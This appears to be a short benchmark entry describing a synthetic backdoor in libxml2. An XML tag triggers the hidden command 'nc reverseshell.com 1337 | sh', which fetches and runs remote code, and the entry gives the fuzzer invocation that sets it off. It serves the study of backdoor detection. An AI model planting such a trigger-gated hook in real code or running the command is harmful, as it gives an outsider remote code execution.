- Type: hidden command
- Affected versions: none (synthetic backdoor)
If the XML file contains the tag <evilElement> under specific conditions, it runs the command
timeout 0.05s nc reverseshell.com 1337 | sh, in an attempt to execute some remote code.
We can use a valid .xml file containing the appropriate tag to trigger the backdoor (e.g., with
the backdoored version):
$ ./backdoored/libxml2_xml_reader_for_file_fuzzer < backdoor-trigger.xml
Unknown hostThe "Unknown host" message comes from the fact that the netcat command cannot actually connect
to port 1337 of reverseshell.com.